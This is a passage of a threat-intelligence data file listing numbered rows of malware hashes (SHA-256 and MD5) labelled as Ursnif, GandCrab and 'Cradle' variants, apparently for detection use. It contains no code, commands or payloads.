216 | Ursnif Variant,b25f08c16f8f936e5d513261e4b767c1ebc3d00aae078eaf1708bcfe4962a276,d0b99583b1e9dbfecc312cfeb3a8ad66
217 | Ursnif Variant,479c3bd3a3a3d3ffd760c4eb82013e52fddbd969e0ea04c73f2cde4d3c620a64,c7982a65a7e7cd0cf30e7bf617512289
218 | Ursnif Variant,7f66b1c5f30bd5cdf674d60841abd1c00a445b17c51fd4d02b1209f9b6e31247,a7c9def00b7fe50f705a6e3e4d7d6fa9
219 | Ursnif Variant,7a6e89ea837aaa9eaf078b57781b6ab367e8cb988d21b32edec1a6314d54ac05,427c29a5950dd2657fca0f30552fcced
220 | Ursnif Variant,410c22e43f97b8efe946765365db34e3485af80c1b394121da95e0f2bb4302a7,92773569c9d19701472a121aa3a821e6
221 | Ursnif Variant,325b79f22e1917b513bf90c436a8aa1606f6cb733f73e3c3f9d6c077deef1425,dc1aef855f51db43e6cfa99ff40e9751
222 | Ursnif Variant,5131f07906cde97cc638d34c8879cfc9298761bd04a80fe94dc33cac86d16011,96d35ab30060422441d4d9e671a9a9a4
223 | Ursnif Variant,746c01bae1a410c505795f3d579ad7d12179de7d8d4392090fdc22ebb4b7454b,15487c2b24e48404284783e6db041d2c
224 | Ursnif Variant,86480edcc886188aa29079e71165b2b91feeb9aa16787b324ec7cab650be928b,1a3d11979e7c813e41799887ae1f062a
225 | Ursnif Variant,69165c9361b537120111371cb77cd2282c48889c5c57f6e5c8cd7948ee9e9f75,f95181b0d52ad2a9033eadfe237dc813
226 | Ursnif Variant,7d8a91edbbb1f38e78b97a8314076ef6c4061006afce4136e75a6e254b135c7a,e3e974d771438f36ebab2ef8d52f1392
227 | Ursnif Variant,30d4c0348b0cdff63ba2ddc5b7891bf91da0a3907ac30241eb699fbfdd97e78c,4b6a52253fc9826d222d02d8c9437818
228 | Ursnif Variant,47f6730bd6546b75cf0e9ed47defc5df68da9d089b8f2acd7723a85cc44f9405,e654337a6e4e50234dd2c8b52a6e1d3d
229 | Ursnif Variant,7384e608a14203985f9a2392f70cd8822cac1fd2688ee3efd6e4ac55b5c9bf64,759945413713c415c0e344b6833ec67a
230 | Ursnif Variant,d7ad498b434ad59d2d940cf3ec59237afbc2051a52fe2dffda3e61c739d9b87d,82e5f7380d613158007aad868cab4cba
231 | Ursnif Variant,2b07b9359a49744393487b7349cbcff88dc018cd32e1bc92241f85682fb7c1c1,b771cf8c946e53605923dcf80b853b23
232 | Ursnif Variant,154548cebfd6cf327efeb6d17c14a05c000e00d341459b52ed12246f532319fc,58d57a3c5c2c849d34a0f52b233a2932
233 | Ursnif Variant,c9faa1635ec5577b6f220f892d1e046955717c486f58a364dde98e916cb23548,e84edcbc2b6c11156cb15cc25148e44c
234 | Ursnif Variant,aa94f950a4ec6529ffe4aac38553168655d4a6fa2b4ee174e0243518c6f15ed5,bbc1f64d4bb3d5606fa0af532badd1e2
235 | Ursnif Variant,c8aea25f763e308877701a6488e6b0c0d089bd52cfbc351f693246a493a574c2,a1893d46089795d64aa6aa39c2675bd6
236 | Ursnif Variant,fa00bfbefef6820343b128e4b31d9509813ffba9835871876d7c5f8d18a3a102,75d49e9360161cf260e312885c3b64d8
237 | Ursnif Variant,24afc24b77671b4426c30c6ef58a77cd533945dfc2749e8e297a81d2b1d95f94,fde1438c67360e44b63b852fab8d4f0c
238 | Ursnif Variant,d1a1ed682b045fb85e37d051c5ae14ed38b4ccf85116178caf8a4157670aaff1,f3d89116ca79b58087e13ff6b4b2e95e
239 | Ursnif Variant,7ceb6eade1df9035a327c93af4286bde58496486023123b26161bee65a5e237b,7f7d004fea13fb27fbfdbdde4f044fb1
240 | Ursnif Variant,6e46ab33869bf745574e871b3f118e4c208ba39e0b4e5912a8704b5bd43d5825,e1fd6b97311705fb47baa37e8c81e293
241 | Ursnif Variant,fb6d3d338904bc824c91b981c147b3e287b69986ca080c1224bfd3e528533a77,be2926d28957759b1032eabcaf360e5b
242 | Ursnif Variant,117c9a20a49f6c28ac9c18d8eb4f5e8bb8c8a09e895e8a38549e15b0c38c4769,32ef0ec5980c139ac0480676a39d4d87
243 | Ursnif Variant,3193db7e33e1570a2776d80457d9fa20a33a30072690cddf9358bf314ce8da4d,6f9247cc73f9a4edb8dcc10c53d19b6b
244 | Ursnif Variant,4140bf6968c3a39274645130e37bf0cb1b550c08c9ed08990bac32b4ad33f172,0712d81b309b67517138deb0bf3831af
245 | Ursnif Variant,dd20ea6713196abfe3e0d36679d71d39e5f469b2ecf28a1584f15f20746d9de3,8db4a5c35f1f26d0a2e8776810287122
246 | Ursnif Variant,0a9a5863863cad2d9a24c01e787278d656f307afdd8bf0e9bbe083e2425e0722,b739bd6c549ddddaaec96497d417d0d9
247 | Ursnif Variant,d17f98ba86ff96b5dc84e5a4ff800791c2a88d36f3ef8827e8ee089790080968,045cc3743d36bb6f5e804a135db89636
248 | Ursnif Variant,fc6e3b3f23619d290016e1aec48c18513a6dcffc771eb02ce2be729db86b0fcc,077c157ae98c9adb65ae7679eb745bd7
249 | Ursnif Variant,918b13d80deed3187481528af2a150796fd4b42fbe41b41aff2f62589f3f5870,1d1ef1809abf83a2dade21aecc12096d
250 | Ursnif Variant,1d21abefd84cbc607015f06769fc9550337f5d200348ff21fb5be183f90222b3,5f283dce79db2639540dd15560db74a0
251 | Ursnif Variant,8efa4ef59e81806a5c34fee1ad6d6339feb01011a8748057782255b64df0cf5f,179bb54d751f35bb306940ad4d1851e8
252 | Ursnif Variant,2593d2f65feead439497173c78a10d57b573269d0ca628c2fc5668d641a04684,644a6c0a511e69be7aaf0a5d4cd728ea
253 | Ursnif Variant,1d0923f9bf58a357fdadf974b8088203e596ab4baa684de5013aadfc5e906b49,99b52883762d40d37e4b5c8e3107143c
254 | Ursnif Variant,9ee80117345e20be3a482b3f680569cfd84f07c72958657906eacc0dd42cc611,61f327e117d5635e584d7dbcf25ea72b
255 | Ursnif Variant,a46bdcf1e4e5244023a54f12c91de56112e6ffc809ae31bf34e95e54a1cea851,49bbfd88b2f25ef066798b090ad9b83f
256 | Ursnif Variant,0c085fadd8063fcddbf4d9f6be50af69b08b3bde7566f68749f88055c6331a1c,248a1a5803762aa8eefa081aa3f36d3f
257 | Ursnif Variant,4c860b1af02834256edfa7db1126fb1490e3787c07a93508d174be7b1fe01175,38e246c1dd0f9ba57e0a1e45fe40ca8b
258 | Ursnif Variant,c85142c57f14a2e45e3f600ceab36e1731a0dc4caed235d63447cb1d48d8a6f5,68d32ad44a94ea9a3f83ed396db6dc82
259 | Ursnif Variant,67082b36ca9dffcb48423dbf5c9bd41d94ec0156df01a15c6d87d16582ed7462,1e30bd0da647c9e03185b53debe0629b
260 | Ursnif Variant,ef4794dacfce59b11e0b794892a0ba3606f083d3643df3f29120c61786dd18ea,c7c3e09b78d75efacc2d0c8819041f8f
261 | Ursnif Variant,f1d52cd34c0df61ffff7039a95cf70434de8162e057ddce98e9568edae1eae62,9080bb674844221333ae5505b7e59fa2
262 | Ursnif Variant,4bc7fcda3035f4624c92c2f6b9ae1e4576b5f49e4e4475895de929ca436ddf20,ff5af93f9d14b90a41f69d76130b64da
263 | Ursnif Variant,8fc83960b4e8e25e17080a63dc1793d4db13d178706f9576395e20df5ce1e78d,fa21d8353e2bc1fa4b803643ff52de29
264 | Ursnif Variant,c8386c0d1ecba6c9edd57338fb2d8219a1d1c1a6ded2d89b26567b452e3a9373,18870c1fa067866d7e4bf4c48d229a0a
265 | Ursnif Variant,daaf4ed5bfe5c7b618a9db321e6117e1b1597c338ae0e055d070d32dbd608838,44ea0d396dee00ee54e3a631133fe308
266 | Ursnif Variant,a61b9e265c59407a10fbbf3a0de2f592ee781b6e2419fc0ecfee2aeb1fd4ca24,e6d2ed37e6f541dc9ab177072062618b
267 | Ursnif Variant,65a3f90a6eeef600695a424e195a4b5076c114481c44641c9ebe56fb7db2ade0,834d5f917b832f77a2320586117e1f57
268 | Ursnif Variant,9b5992a4468fbf78d54ac91af29a6718da0f36a453a8c8f4dbb62c04425bcf31,b8d189290d5d42ac9168f1071f3ce1ef
269 | Ursnif Variant,a5bbfb42a1051ba4ccfd73ccd2fef7dbcf15b32c5f12b120fbfb7641c0e46708,af9da4b92b129a87cac4b1b1b1e84731
270 | Ursnif Variant,7bc2e7b91233c94115d3fb6cfaa3ad29d052ccdce70329ef6051da70b7674139,4a8e584b67bb507f27da7f6cfd52b25d
271 | Ursnif Variant,73946f631d76d8a59be2648cc71dacc99d7549f0ab44a9c94bfd4fe32cf77f5a,ddcb34b860e9c6074dad98686ecdf19f
272 | Ursnif Variant,cf24f90f234002a190b14d2741b8de583076bc3502245f694c1ddd4efd4cbeac,78bce5e01f091b007ded098857a442e7
273 | Ursnif Variant,eaeefb654a6ea0087cbac9574f61a7bb55f29f96d99d2c623044b8da5478f502,dd2442f7d4258f7ce197a39f9140b454
274 | Ursnif Variant,7b13d0149faf344e928cce62f24e90aed4913db98d25a6a96e4f802e0bf4e450,e88db30f7197c5a6d3345b14519c6e27
275 | Ursnif Variant,2f50cd8d3256c041ee1b803b9e229f81004835fb9b1b25787346ccdefc62b153,24dc9e452af9e6ca8190589fde183245
276 | Ursnif Variant,a30573011030c4e9f12ae4be142c4ab70d268fc132346c24a947d8ca698fae2d,5035ef65dcaa914c0aa8a6130c19887e
277 | Ursnif Variant,98bafb19352075bb13bee3a2f4824868feb5b4db0776c3a7497013f5f6ea7dcf,f139d395970d41860866dd675230b99f
278 | Ursnif Variant,7846d33f6ec352546235818871ecaf5ba70811d4ebfda4d4fbbb7b5305a67a36,3edf99a377ff6319b7a94a42ef2c9f6e
279 | Ursnif Variant,cf07efb532838e6877e88c40f4e69d7f77800248e91af8a553663ca0bd3ae7ef,706c33055fa45c303f62ca3c6241884d
280 | Ursnif Variant,05e6c944a139a37a1a7abb5da5af5ddbb378a0949c3b9fbb1498d286623ef85a,339f444d0fe1f01dbaf99503d43f173c
281 | Ursnif Variant,395ff5e5a0f149dd3eaf05f1330df70f4dfac14c60386642f25593292f109847,947bfabcd8bef6052527ae2e43a1ce7a
282 | Ursnif Variant,08db0d760bcb1ca22f24dde4b06ae8978c832b47e5c86f3e903219278f519933,da77271c8ad1ba830a8f2ef7e42f0b39
283 | Ursnif Variant,21b1a6464178a651a748857f088473ae3154a83cf63540261ce84eb7fbf2a234,b1c1880853f4375e961a9f0a87f84ad0
284 | Ursnif Variant,ab6af6765fb5c39f7823992f823c06ac725a2a540ce0122a58809d97731f4462,6f7d5f5e4d486aaf9c8a3e4ef1877f84
285 | Ursnif Variant,f466a75cb24e2c27c5bf7ef46f1cbc27bfd5d2f3a5055a0c41470b5495c9d74f,5d9701bd410efae8a60bb997cd88face
286 | Ursnif Variant,61e668f79ade08a08124508c860099c842f5f70ce6a7151a3df17e7b613135b3,21cc1664594168b7dcb28bf577c80c51
287 | Ursnif Variant,7bc84737bab1f85a443ff4b77650b1722d1906022556876c609aa943d983e526,5ef5d811ea81294f4d5d8de48966b8e2
288 | Ursnif Variant,97b69baede9bb0d3bc0bd5a21dd8a5eecd8448d0e2eb509a69ac2daf0a278f85,19fd84bb01fbc1296f679f2b264d5d3d
289 | Ursnif Variant,e963f86daba6d6f59946e0935da060eb2053d2fb26df619b4f8c966e3c25c934,3f796159c363daa8d2e7c68f29455d52
290 | Ursnif Variant,2887117b19363d209f9d47ee5b3b9d33a9357d7584dabd1e0cef3a33b43500f2,aa6e0b4909e3252ec461bded9cbe7458
291 | Ursnif Variant,303b59e0ce995e52d11c7243d8c6082f878436825b119adf47441b9adcd23b35,ed49473dada4c419a6a580a5caa74481
292 | Ursnif Variant,ee0f27a72967e8689b46f72bfe3295c63f036a27d3bcc6b3e07602340c70b3a9,10993b294e9b079249a698a548a04f09
293 | Ursnif Variant,2df02d68b0f08cab1f6c5855b34599a610a51bd1f9d1df746aa72ac461d551b8,298ed967c6fb0b8641d3ba0ff634f9ee
294 | Ursnif Variant,f43aae4c32e36056c507374396380f975a84fcb216d9eee92330af65db4741f7,68edf9c58c1877fbc033b5151d02acea
295 | Ursnif Variant,d64ee497aee7a9bb569130b1602d9485cae425eee3c5bcfd015d8f4034ed1452,7ee8300d5808b7af0681f8d397a531ba
296 | Ursnif Variant,c190aaf1e91952bd85e280c91827920205e3a9ca54d74ee5c0295f0a7ffb11b2,59a2937c2aa85cb2186a1932a03a8dcf
297 | Ursnif Variant,a7dbeb1f4d48b2229bf2ad62213bc452df3919b4da403f85c9642cd0c16a7835,7edcfabfd678ab0c2759256649cb48f6
298 | Ursnif Variant,90a57383b34251c2020e53eaa9eaad4d7bf37d7f62a3162657919027b6d12a07,12d85d1f7da37561dbc6ad3c8b8e5a8e
299 | Ursnif Variant,1aec7136dc18c9dcf4c5feebba60484ee2dc6f44eacbe5d1f67c6cff248b558e,88fb17126cd78a52b101a870282bb536
300 | Ursnif Variant,287a10fc8cd08f3ee721cef7977127a13c5dd93f2c6051f227c4731500c1b442,eb1512ea00e5930ce8ce37dacdd85c81
301 | Ursnif Variant,a348275b844432ec598d76496c8fccd6a9aa488be707709a64bdf3d3b8acb231,99eeb35a52ad7823a7f44a2d5ef70b02
302 | Ursnif Variant,0d31e3776e9a3b33ecec4f3eb1ebab1613dd5669e978f1db6d0430dc935a9f9e,a574aa0ad92a6d5c3242dbc72dc13b33
303 | Ursnif Variant,db2c753948ffb71db865e84408435f9480fb9c631c9234be22c96a89db2c2c6b,f8137611e3d0e55c5c97a571d04e2d96
304 | Ursnif Variant,e46a970bba107b5ba586db2eb133e2967cfc3e92f759042459d92eaea5de4e05,a13a1b8352a4b93c41418b865ba02abd
305 | Ursnif Variant,2730daa49dbc70069432dfb5c21d993860e13778be3922d10fec9b19f2d641b6,db38b842febe174018551b4bd8e77f4f
306 | Ursnif Variant,c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f,404d25e3a18bda19a238f77270837198
307 | GandCrab Variant,d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525,ce1ee671fe5246a9c40b624ef97e4de1
308 | GandCrab Variant,aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8,07f955796a252771861c8e0db06b1f01
309 | GandCrab Variant,8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec,4fcd0d13ea669a83a749ae5bfb098ca2
310 | GandCrab Variant,933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0,8ec87fd3ea777fa8d5160dc957e6683e
311 | GandCrab Variant,e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776,c7d5077960882259b85c01fd41c49ffd
312 | GandCrab Variant,8ee4dbbdcfbbe13669f0484b168d5d9fa7b3db7732b567c9ae507f3bdd39afd3,9916e107b3d501c60d4baaf1b8f8a77a
313 | GandCrab Variant,2fce4ed2d23e687482f1fd165932dd3b292173d4e4f5991bc9329384699fb00f,24a1ac0b0cd98114910888fe63f7e502
314 | GandCrab Variant,0a9b334682b8ffeafef0fa230f0821bf8e0e0193212de7e6c2c1e528008c237f,920e473f3a483937a27ab65c0e170a38
315 | GandCrab Variant,b24ec3bc9de1faa5a55c54835c2673e244e7b42e291f70cbdc2c23672abc7067,647ce0159d62ba5e42a1a1ee52c83ee6
316 | GandCrab Variant,c5fe4b5d1803a096c1a4330512406595bb585846b4a691459de1a65b6b390409,5f0cadac003b971e92b2626dc8234524
317 | GandCrab Variant,ca1381e1e5a506e5fc69278c6989249c5571dc59df872af69bdd4720a3219e93,600da7a702e37934c7bef9f285f9b532
318 | GandCrab Variant,0b28b28ab38a34c86501ac7eac77464ac77ce36f0cbde16b818dc8723032cd6b,ae8c315a447c91012139b82dd92224a1
319 | GandCrab Variant,9cf10f8b2444eaa0c2fbbf199d5fe583923ed14cb92ddd5445b3e6ffcc86152a,8f78176a1aa30d302cd2997a32cfdc79
320 | GandCrab Variant,c2464e1aa533ead8d2c2d27a388ae2617616cf17c2c4936b72991e33f0c2ccff,2e99d80a8b6534a2604d5ea918a3879e
321 | GandCrab Variant,04012bef09ae476e8505bf140a0d49a97c38e54f082ebcd0b9eabba6e4ef8deb,7b29dfcc04993f4fa6445fc4f56fb7fd
322 | GandCrab Variant,dbb88de4201933bdb099b21f91786be636b6e4486765f023abd3319300ed0006,5bc5696a899074cb3623aa640602c8ad
323 | GandCrab Variant,c5aef7cf92dfe4d5be086d9dd75f960e54024499ca86d768460ddcdefe59b751,ad5a2dde47b4ab1ed1cc90fb0b039869
324 | GandCrab Variant,c7f2cb7fb3ce23e7144c1ff6bffa3dc013d706be2d78ed7da3c07064c71aa08c,4243cfc0166904e87b754593aeeb1fae
325 | GandCrab Variant,67db8a1398d4a54f1d1e4ee4e3f729e3f48b1d60380e478d61656fa2ad119df2,f0b616050bbab2b65110379cd4b448af
326 | GandCrab Variant,7da877e695e8793bc185b134468fe8f391bbc13d34b382c6f1bbd24dcd8c34fe,4edc189469b0199764ad02890ec52791
327 | GandCrab Variant,de26d1c03bdcbc3059de02cda9a24e75dea077a40c51d5ef7e908dca33818883,56ae8a18070ee4334d4163338ecb7cb8
328 | GandCrab Variant,ffe577ed01255bf462c0257a2333e6a0c1cf3472c92171885fdad45ae958e56d,0f270db9ab9361e20058b8c6129bf30e
329 | GandCrab Variant,7cbc7453ac42556c52a88011cca5e634d86a3f5398e44c8d33b3c08f0ffde633,1ef3f352d97ba827f446f6e8708aa054
330 | GandCrab Variant,eb630954eca8187618ea8c81a6bc260ef45af95ae0e52306e7e9a14ce51885f1,7d7679944649c0eb39feb62dca1390ae
331 | GandCrab Variant,e5c522e14a66c7ee82d5e68db74f8b44d1a8e43e4a674b17a8405b21a9845bb4,0b33e34e26c6e53c346517edd3dd9841
332 | GandCrab Variant,ca63965941add686c00e72a57c4af9c1d1861ecfe36639190efb56810d3cee57,c397591f6b7678fa7c260cad23f97fbc
333 | GandCrab Variant,5a58e0bb60630fcb25ac0c57df0558eca7376376ccb93513b1aa6e1119f49b26,80604b65968dcb6b013d182203e016ae
334 | GandCrab Variant,9d6ca2955d070b2b32fe4b034c8f622f44ba9c2c5b703312b010ec469432a984,e8cda086a480f56b8de88d1d83cd4df4
335 | GandCrab Variant,4b5fe7497864d07f78af15fa3e1aa3702b303b89f9644624871d83dd0f484749,a3af0700aa029bce5684ccfd5531bcf3
336 | GandCrab Variant,43911f3a36ede4a5c71a82c27a49e68cab0d0a309d934fab07d9655b30978de5,50c0c967b590235bb84fadd52e17d906
337 | GandCrab Variant,007988b1ffdce1e161071f92a130b64650735a5eed6445806c2c967d0902c286,f2e83452c8af69d031ab5b4f6442f802
338 | GandCrab Variant,da8c0a6ac025e95d408e72e2656d4cad02d4a3b4027ecef9d97c1a12311f37b4,be106f7d6f2f29724cfb0272c4f024f6
339 | GandCrab Variant,02df57cb16dd7c4b42e45fcc77638e460001f8cc53b7436d4e2f978f528b8e0b,aedb746cd1ba05b21f7e8141cfd95cc6
340 | GandCrab Variant,658b2e2ff815267582ca2e09c1ecd1ce18d10757e196999ae1a471221645ae6f,baf770d79dd3a31238feb77922dee9f3
341 | GandCrab Variant,e42fbcc86cd6efa1594057d920aedc6deaeb02aa03df675a9c11434a436c464f,a847df6b845406d596e0b503cab9eb6e
342 | GandCrab Variant,4c09f544d3d0775933d2e0be26e1d308dc302b231b01dd1ad1da95b460c24bc3,2ee84dfc015d82a3145ba51d1b3b3a73
343 | GandCrab Variant,b13d138b8e2d9c9aefc787e6cf7bafc61826e1259ee8f512dbae58eb86db7b97,96f38dc9816140fc3f63e540e9d9292e
344 | GandCrab Variant,e40f4ece3574f58a121d4d69162c036d4f903354f77836e8ebd570db01defc87,8e0ecc245f56f77e720c54f765cfa396
345 | GandCrab Variant,4be2d7cc2d715d7e5b87eb21f0c984f4da961d63aec448c790800fc1f76f2b98,1de7f6df1f5cd88c36d79c2f0ce0e6b2
346 | GandCrab Variant,3e4d1839a2882f831e04ea51082df3e4422c2b1d12daa5a8a8de7b48b5419c47,f81080a77a7cedfb99c5bd3db78547c4
347 | GandCrab Variant,60d2a00005ccfeb478a073ac485a66ebdf8498284f7bc59213251f77932f7306,ad32c2d46b2b74d93f86c130b7d5f6dd
348 | GandCrab Variant,da7acec9380c8479d1131fdcec33107ecfac90c51e6fab9cb1a2e24b3098a606,946f912837d7aeff36fc683c7de5e03a
349 | GandCrab Variant,b2936d7135282236bbafd816a31892ca254d768ac69fda4d25f1ce69d4948919,e66baf5880f9749f87acc02e35a0bf33
350 | GandCrab Variant,eecbd23ceccd6e5e6b135419fd435a2b10cc12cc0b386a5a4ff2f5dfe28fd5f3,2ceb96bdf1dbbb3618311a94bae124a3
351 | GandCrab Variant,97d8351aac1137187f38deeb4b3f7743c414600681126410501ace48aabfe532,a1769e3e38249ea6f218f628cb551010
352 | GandCrab Variant,50ab1dadecf027533a17ccd2f4c9fb571432285567c914fd81540b8fbd9203bc,43dfb6a59130c5b3dfc417b10d347498
353 | GandCrab Variant,5cbc42e68adfd11c7054674a027eae6594bf8f116568d1718976d3465e7675bd,f20a815b1feb9d3df8ce512d40e39fac
354 | GandCrab Variant,f2a712b804c838abf68be44c14d58aab4aa7873c8812fd1f2a9cf0fb112bfc79,46cc8350def065ec86934edea49de860
355 | GandCrab Variant,a9254c4357e684756f5556ab0ba0182e5fb41401080f83af927abd432d8bccf1,25d2cf33413d13f1c36d071d0e33d4d0
356 | GandCrab Variant,fe20054bc1bfe3feee965833b8af2f35acdd2d9a9f28a0ecf307494ac6e1b664,24275604649ac0abafe99b981b914fbc
357 | GandCrab Variant,fe56fa9266ddd1f9a864eabac6174815fd5315e6978067a4592b8949ea321270,d044106fa47f15198f8e26eb64f7394c
358 | GandCrab Variant,de4e50fa18bae7964ea77d1e015265e4c2232e5bc7d97d28e420c942ce65d6c0,d968a6bab562d04e73a773dece109f80
359 | GandCrab Variant,92aadeb4fb086bc672e28de288ab684990d4efbd43cdd94380037e4990a14b3f,21bfa1dc51db0926cf4a4cea27da1504
360 | GandCrab Variant,4bc87443c8b2440dbec1a1c5079b78f92e7758df236520787062a9a760c98459,49c2431b9b7f32118a491728059e32cc
361 | GandCrab Variant,add67e3a4531d237e3c2b581c4f3eab46209a611ee73fd16758c5fb2cbb842bb,b990954d3cfadfd99969deacacdb00e7
362 | GandCrab Variant,435a6b2421306dc072505c728ac7ce8afe99e0285b14730055942eec6081c5ab,a9dbdfa4af98af0b90a995a1ee451b64
363 | GandCrab Variant,e81dadfcfc8a9b12b992f216b3ed3c04bd404e77e5b690d601a27c71a7a2967d,1514dfdf8645fb2bfe1b76282d0b9c2d
364 | GandCrab Variant,79c6969732ac6151aae2e67867a1feff9e6740f9db08ce07187367379b0f5179,18540ea0b6f7e0633c3907fe90310165
365 | GandCrab Variant,23e59d431f392d39e141291938bbc8afcfcc15d821db85bd4facc8b8249e4717,e90fb0702733d4ee716bcd4acef9fd07
366 | GandCrab Variant,6810a249c8905564bc4b143d87ed539e922545a9bb7126ce9159ebcde9695aaf,31b0542612ddefde00c650fe828ccd35
367 | GandCrab Variant,32ed7f3e60bb4b8d927ec548d3c95d9d6327f5b376e77165b3867f29f9ba4558,20bdad92eb281bdee8436d835c401b4b
368 | GandCrab Variant,72311ef28d4b489360c8db938dc45650f95733a8ed316f53a759b3928e8e73e9,9cea364f372f26852544a46a0f3a7461
369 | GandCrab Variant,45d7d7b1bcad2b5d70f67b8ef7e006df8d03eb0d5e8af12a7aed5a68f1c34a07,90f14f16e79d6e83fc296eb50db87059
370 | GandCrab Variant,53b58eebbfc0d6db0898132d72f191368a78a8e34140f0e74a2c179f3cd07664,73f0eed8c39217c35f56386f52b29980
371 | GandCrab Variant,6c3d5ab1ecfc9aaedd1722893d88af445029a19d3a0c67050bbc89da9240c31f,7827adb7d47dd3d8af3fc9e545a53fca
372 | GandCrab Variant,d2f237743c9bf65873afa65a45f02c01fd91315e6d7406fec02dc50c3255ab9b,f2a2bcd748c011c0ea1d7d64af5e4452
373 | GandCrab Variant,736ea4918754271584615622fca280fb272f613f83bdb2b867fe1131482b4c3d,cb067aa3f71d1d59c9b91fe8b4632c4c
374 | GandCrab Variant,94e829c84786c6a10a7552d591a08b577921d6d6b8942a48cac2a3cbdfef8107,620020e45bf08e6d9fba923386339395
375 | GandCrab Variant,e3c1d82108339e1e923bf13986593391b732f4b0dbfadb3612eed6a40123229f,faa0f43f8c37845072966090a5eccf2f
376 | GandCrab Variant,366fa0bc8cd1ca93ae22e25734ab854a1188ad171c2b8bed0b8e910385f44911,c0a972bfbb576c4cd296bae03890b2a1
377 | GandCrab Variant,1b49a23f6ce95e63d52e263d60ab9da05ad6a423b5aea69360479a0965889014,96258da069bd066a234cdf33289fbd87
378 | GandCrab Variant,8ee40eb0e93a94fbac47c990a0944b4d40e408bfe77a447fcc18c50dcb430347,485162da155381fedb5783f645b1fba6
379 | GandCrab Variant,4aab275b3318ccc3432c065561a1911c7f7b9d3b5d7aa7ec1d8e5bffa6c7409f,211e4a365c02101b1f72e515f97bd5ee
380 | GandCrab Variant,e954f7f030aaa08ffa2fb7038614e59be392680fdaa0d0ce63ef5195d5d42b16,04f2a82387c8e503f655921da892cf9c
381 | GandCrab Variant,db2884a9012cf6e8ea5b3fabb0d02a9487eb412e75085b37188d5e8f4ada7ca9,fabb492a76f35b91be519c239621b2f2
382 | GandCrab Variant,6d291c12fdb7ded66cb67088bb2fc84a28b2f36f22a599cb9a03b41b02fe0540,d40a530582e67ed1e8f7fa46cd4049d6
383 | GandCrab Variant,d1a9e47c59b13160bf062ac7d2b2552655e0aef751c1d92258f591114e1a48bf,f05a16da38363817036b4bc4acd0e491
384 | GandCrab Variant,edd381859129f4e84666944ca9373fb5da4fa0da7c25445bb302bad2d9c1db62,69996b52ec0785a47c09fc8c8127c63c
385 | GandCrab Variant,012b97bac3f23e63bcf1399f49d559ecf7523bd9a8693f1c483f1f1db79b8c63,f7634cc3f920fedfa67a33e078335c32
386 | GandCrab Variant,0d8a1610fbe90831d4aae127563c8b6d0f0fe85aae3cd7062013f74cf38be4f0,e54a9f893a9359ebea71d892990b67bf
387 | GandCrab Variant,403857de4d8406fb162dd53e1bb5744a468b47d138a9555f836bebb3c728dd99,12f7743a2b1cc9ce59b16073d918dd86
388 | Cradle Variants,3b59549507e0e3cfb4a363a306bf6eb4d26995066df643e1fc8e4e11eaffa7f9,c56ca5197663dbb387a728fe0b05c92d
389 | Cradle Variants,debe4cb5645f10e6b6383838c25f26781a61acb536d2246cdf8dc33bbc1a2414,60c64e1d10223257c4595eff4b7a623e
390 | Cradle Variants,a611528272b535dc4d6a0da1d82f45dcf03044cf719bd0faa9c38380200e0256,47bffeef29c85eb715f5b82fb6262db5
391 | Cradle Variants,d5340fec2aa3a89fd1c59c4e0fc1ac6d555cee377d7815f9dff8e17c3b9409e8,f41dcc4aceaf41ef1aad6eb4157e79de
392 | Cradle Variants,6eef1f43012358b7585a243d79a070b716a13d77dd51ad89d903539283519721,467fc7fdc8c90999658297a18087d657
393 | Cradle Variants,234ae126405324aae9d60bd011dc4ba0c462eb2e8f5608386f0d4b03a0b3e6b0,4c8ffc0e6c7fc4ba4f9cd5c12fae12e0
394 | Cradle Variants,df4b3c1e20e0edd4c9cae6746e15651421cd53ecb386ba363712fa4d14ec4af1,1c7853dcde09811af7f3160eb8dfd705
395 | Cradle Variants,22ab5ea685e0702b7d6d51cc882f42fb53c993c107004bc1f5ddc71cfa8cc2af,f1774a481ef7852935aa00907359a2cf
396 | 


--------------------------------------------------------------------------------